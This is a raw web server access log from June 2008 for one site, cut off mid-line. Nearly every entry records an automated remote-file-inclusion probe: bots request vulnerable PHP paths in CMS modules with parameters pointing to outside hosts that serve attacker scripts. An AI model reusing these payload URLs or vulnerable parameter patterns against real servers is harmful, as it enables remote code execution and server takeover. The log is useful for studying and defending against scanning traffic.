87.22.37.144 - - [08/Jun/2008:12:16:42 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.189 - - [08/Jun/2008:12:16:47 -0700] "GET /logs/access_070626.log HTTP/1.0" 200 32190 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:12:17:02 -0700] "GET /logs/access_080109.log//modules/TotalCalendar/about.php?inc_dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.82.202 - - [08/Jun/2008:12:17:25 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.82.202 - - [08/Jun/2008:12:17:25 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:17:40 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:17:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:17:45 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:12:18:36 -0700] "GET /logs//errors.php?error=http://www.geocities.com/mirza.putri/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:18:40 -0700] "GET /logs/access_080225.log/print.php?page=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:12:19:11 -0700] "GET /logs/access_080326.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:12:19:12 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:12:19:12 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:12:19:12 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:19:29 -0700] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:12:19:33 -0700] "GET /logs/access_080326.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.157.211.204 - - [08/Jun/2008:12:19:39 -0700] "GET /index2.php?page=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:12:20:15 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:20:23 -0700] "GET /logs/access_080103.log/index1.php?v=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:20:24 -0700] "GET /index1.php?v=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:20:24 -0700] "GET /logs/index1.php?v=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:12:20:32 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:12:20:33 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:12:20:33 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:12:20:42 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:20:42 -0700] "GET /index2.php?showpage=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:12:20:42 -0700] "GET /htmltonuke.php?filnavn=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:12:20:47 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.77.72 - - [08/Jun/2008:12:20:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.77.72 - - [08/Jun/2008:12:20:49 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:12:20:54 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:20:57 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:20:58 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:20:58 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:21:11 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:21:17 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:21:17 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:21:17 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.253.104.19 - - [08/Jun/2008:12:21:25 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.49.157 - - [08/Jun/2008:12:21:35 -0700] "GET /admin.php?x=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:21:35 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:21:35 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.49.157 - - [08/Jun/2008:12:21:36 -0700] "GET /logs/admin.php?x=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:12:21:41 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [08/Jun/2008:12:22:08 -0700] "GET /index3.php?site=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.116.44.60 - - [08/Jun/2008:12:22:08 -0700] "GET /logs/index3.php?site=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.7.198.112 - - [08/Jun/2008:12:22:30 -0700] "GET /logs/access_071225.log//config.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:22:39 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:22:39 -0700] "GET //admin/index.php?o=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:22:39 -0700] "GET /logs//admin/index.php?o=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:12:23:13 -0700] "GET /logs/access_080312.log//config.php?path[docroot]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.174.65.190 - - [08/Jun/2008:12:23:14 -0700] "GET /logs/access_080117.log//mambots/content/multithumb/configuration.php?mosConfig_absolute_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:12:23:19 -0700] "GET /logs//admin/index.php?o=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:12:23:19 -0700] "GET //admin/index.php?o=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:12:23:19 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:23:51 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:23:51 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:23:52 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.223.116.60 - - [08/Jun/2008:12:24:12 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://ipnosiolistica.org/images/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:24:14 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:24:19 -0700] "GET /config.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:24:19 -0700] "GET /logs/config.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:24:31 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:12:24:50 -0700] "GET /logs/access_080505.log/forum.php?act=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:12:24:51 -0700] "GET /forum.php?act=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:12:24:52 -0700] "GET /logs/forum.php?act=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:24:55 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:24:55 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:24:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [08/Jun/2008:12:24:59 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:25:14 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:25:33 -0700] "GET /include.php?path[docroot]=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:12:26:02 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.22.228.144 - - [08/Jun/2008:12:26:07 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://intranet.unillanos.edu.co//contratacion.new/css/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [08/Jun/2008:12:26:08 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://intranet.unillanos.edu.co//contratacion.new/css/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [08/Jun/2008:12:26:08 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://intranet.unillanos.edu.co//contratacion.new/css/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:12:26:31 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:12:26:31 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:27:08 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:27:08 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.22.228.144 - - [08/Jun/2008:12:27:13 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://intranet.unillanos.edu.co//contratacion.new/css/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [08/Jun/2008:12:27:13 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://intranet.unillanos.edu.co//contratacion.new/css/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [08/Jun/2008:12:27:14 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://intranet.unillanos.edu.co//contratacion.new/css/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [08/Jun/2008:12:27:24 -0700] "GET /?show=slide&pageid=17 HTTP/1.1" 200 33175 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:27:28 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:27:57 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:27:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:27:58 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:28:01 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:28:03 -0700] "GET /logs/access_080507.log/index.php?ort=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:28:06 -0700] "GET /index.php?ort=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 200 16837 "-" "libwww-perl/5.812" "www.dmulk.com"
72.30.215.121 - - [08/Jun/2008:12:28:07 -0700] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:12:28:15 -0700] "GET /logs/index.php?ort=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.47.60.169 - - [08/Jun/2008:12:28:45 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
61.47.60.169 - - [08/Jun/2008:12:28:45 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:29:02 -0700] "GET /logs/access_080429.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:12:29:43 -0700] "GET /logs/access_080429.log/?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.189 - - [08/Jun/2008:12:30:12 -0700] "GET /logs/access_071124.log HTTP/1.0" 200 55613 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:30:25 -0700] "GET /logs/access_080505.log/forum.php?act=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:30:25 -0700] "GET /forum.php?act=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:30:25 -0700] "GET /logs/forum.php?act=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:30:52 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:30:52 -0700] "GET /contact.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:12:30:52 -0700] "GET /logs/contact.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:30:52 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:30:53 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:12:30:57 -0700] "GET /logs/access_080429.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:31:14 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:31:14 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:31:14 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:12:31:25 -0700] "GET /logs/access_080429.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.46.131.186 - - [08/Jun/2008:12:31:36 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:31:46 -0700] "GET /logs/access_080117.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:31:48 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:31:49 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:12:31:49 -0700] "GET /logs/access_080